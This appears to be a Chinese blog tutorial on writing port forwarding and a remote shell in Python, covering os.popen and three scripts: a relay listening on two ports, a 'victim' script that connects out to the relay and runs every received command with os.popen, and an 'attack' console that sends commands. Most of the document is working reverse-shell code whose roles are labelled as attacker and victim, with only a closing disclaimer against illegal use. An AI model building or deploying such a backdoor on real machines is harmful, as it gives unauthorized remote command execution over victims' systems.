python写端口转发,和传递shell
相关知识
1.socket模块
2.os库的os.popen()函数
socket库搜别人的教程
os.popen()函数,贴出下面实例
# coding:utf-8
import os
while True:
dosf = input("输入命令>>")
if dosf == "exit":
break
res = os.popen(dosf).read()
print(res)
可以看到,input()得到一个命令str,然后用popen()方法得以执行,返回一个对象,对象的read()方法会返回命令str的执行结果。
原理图
文件源码
说明:没有做异常处理。
1.relay.py
from socket import *
l1 = socket(AF_INET,SOCK_STREAM)
l2 = socket(AF_INET,SOCK_STREAM)
addr1 = ('192.168.1.24',4000)
addr2 = ('192.168.1.24',4001)
l1.bind(addr1)
l2.bind(addr2)
l1.listen(1)
l2.listen(1)
s1,attack = l1.accept()
print(attack,"attk接入")
s2,victim = l2.accept()
print(victim,"vict接入")
while True:
attk = s1.recv(1024)
print("attk:",attk.decode())
if attk == b"quit":
l1.close()
l2.close()
s1.close()
s2.close()
break
s2.send(attk)
info = s2.recv(1024)
print("vict:",info.decode())
s1.send(info)
2.victim.py
from socket import *
import os
#下面三句是在linux下运行时要加上,否则可能报错
import sys
reload(sys)
sys.setdefaultencoding('utf8')
####
sock=socket(AF_INET, SOCK_STREAM)
sock.connect(('192.168.1.24',4001))
while True:
data = sock.recv(1024)
dosf = os.popen(data.decode())
info = dosf.read()
sock.send(info.encode())
3.attack.py
from socket import *
client=socket(AF_INET, SOCK_STREAM)
client.connect(('192.168.1.24',4000 ))
while True:
data=input('Shell >>')
client.send(data.encode())
print('Execute:',data)
if data=="quit":
break
data=client.recv(1024)
print('Receive:',data.decode())
声明:原创文章,技术分享,禁止用于非法用途,违者后果自负,与本博主无关